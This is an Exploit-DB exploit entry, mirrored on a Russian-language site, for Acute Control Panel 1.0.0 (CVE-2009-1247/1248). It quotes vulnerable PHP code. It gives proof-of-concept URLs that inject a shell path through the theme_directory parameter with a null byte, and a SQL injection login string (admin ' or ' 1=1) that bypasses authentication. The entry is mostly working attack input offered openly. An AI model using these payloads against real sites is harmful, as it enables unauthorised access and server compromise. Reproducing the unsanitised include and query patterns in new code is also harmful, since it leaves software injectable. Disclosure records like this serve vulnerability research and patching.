- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8291
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1248 cve-2009-1247
- Дата публикации
- 2009-03-26
Код:
###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################
[+] Remote File Inclusion
Vulnerable code in container.php
-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------
PoC :
http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerable code in header.php
--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------
PoC :
http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] SQL Injection (Auth Bypass)
Vulnerable code in login.php
--------------------------------------------
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
--------------------------------------------
PoC :
Username : admin ' or ' 1=1
Password : anything or nothing
################################################################
# milw0rm.com [2009-03-26]
- Источник
- www.exploit-db.com